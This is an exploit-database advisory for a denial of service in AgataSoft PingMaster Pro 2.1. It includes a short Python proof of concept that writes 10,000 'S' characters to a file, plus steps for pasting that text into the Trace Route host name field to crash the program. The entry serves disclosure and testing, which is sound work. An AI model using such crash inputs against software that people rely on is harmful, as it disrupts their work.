AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)

vendor:

PingMaster Pro

by:

Ismael Nava

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: PingMaster Pro

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:agatasoft:pingmaster_pro:2.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home x64

2021

AgataSoft PingMaster Pro 2.1 – Denial of Service (PoC)

AgataSoft PingMaster Pro 2.1 is vulnerable to a denial of service attack. An attacker can create a malicious .txt file containing a large number of 'S' characters and then copy the content of the file into the 'Host name' field in the 'Trace Route' option of the program. This will cause the program to crash.

Mitigation:

Ensure that the program is updated to the latest version and that all input is properly validated.

Source

Exploit-DB raw data:

# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: http://agatasoft.com/
# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
# Version: 2.1
# Tested on: Windows 10 Home x64

#STEPS
# Open the program AgataSoft PingMaster Pro
# In Tools select the option Trace Route
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field Host name and click in Get IP from host name
# End :)


buffer = 'S' * 10000

try: 
    file = open("Gou.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")